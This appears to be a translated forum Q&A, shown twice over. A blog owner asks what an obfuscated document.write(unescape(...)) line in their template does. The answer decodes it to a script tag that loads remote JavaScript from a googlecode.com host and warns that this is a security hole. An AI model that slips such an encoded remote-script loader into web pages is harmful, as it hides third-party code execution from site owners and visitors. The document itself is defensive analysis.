解码 JavaScript 代码?
decode JavaScript code ?
我在博客模板中找到了这段代码,已经使用了。恐怕是有害的博客,或者是注射..我正在尝试解码但失败了,所以请帮忙?因为我想确定它是什么,
document.write( unescape( '%3C%73%63%72%69%70%74%20%73%72%63%3D%27%68%74%74%70%73%3A%2F%2F%61%72%6C%69%6E%61%2D%64%65%73%69%67%6E%2E%67%6F%6F%67%6C%65%63%6F%64%65%2E%63%6F%6D%2F%73%76%6E%2F%76%69%65%77%6D%65%2E%6A%73%27%20%74%79%70%65%3D%27%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%27%2F%3E'
))
console.log( unescape( '%3C%73%63%72%69%70%74%20%73%72%63%3D%27%68%74%74%70%73%3A%2F%2F%61%72%6C%69%6E%61%2D%64%65%73%69%67%6E%2E%67%6F%6F%67%6C%65%63%6F%64%65%2E%63%6F%6D%2F%73%76%6E%2F%76%69%65%77%6D%65%2E%6A%73%27%20%74%79%70%65%3D%27%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%27%2F%3E'
))
如上评论所述,使用console.log查看内容。这会产生 https://arlina-design.googlecode.com/svn/viewme.js,似乎出现 404 错误,但如果所有者将其备份,则他们可以 运行 该代码——他们控制的代码。如果你包含它,它可以访问你的网页,这是一个安全漏洞。
我在博客模板中找到了这段代码,已经使用了。恐怕是有害的博客,或者是注射..我正在尝试解码但失败了,所以请帮忙?因为我想确定它是什么,
document.write( unescape( '%3C%73%63%72%69%70%74%20%73%72%63%3D%27%68%74%74%70%73%3A%2F%2F%61%72%6C%69%6E%61%2D%64%65%73%69%67%6E%2E%67%6F%6F%67%6C%65%63%6F%64%65%2E%63%6F%6D%2F%73%76%6E%2F%76%69%65%77%6D%65%2E%6A%73%27%20%74%79%70%65%3D%27%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%27%2F%3E' ))
console.log( unescape( '%3C%73%63%72%69%70%74%20%73%72%63%3D%27%68%74%74%70%73%3A%2F%2F%61%72%6C%69%6E%61%2D%64%65%73%69%67%6E%2E%67%6F%6F%67%6C%65%63%6F%64%65%2E%63%6F%6D%2F%73%76%6E%2F%76%69%65%77%6D%65%2E%6A%73%27%20%74%79%70%65%3D%27%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%27%2F%3E'
))
如上评论所述,使用console.log查看内容。这会产生 https://arlina-design.googlecode.com/svn/viewme.js,似乎出现 404 错误,但如果所有者将其备份,则他们可以 运行 该代码——他们控制的代码。如果你包含它,它可以访问你的网页,这是一个安全漏洞。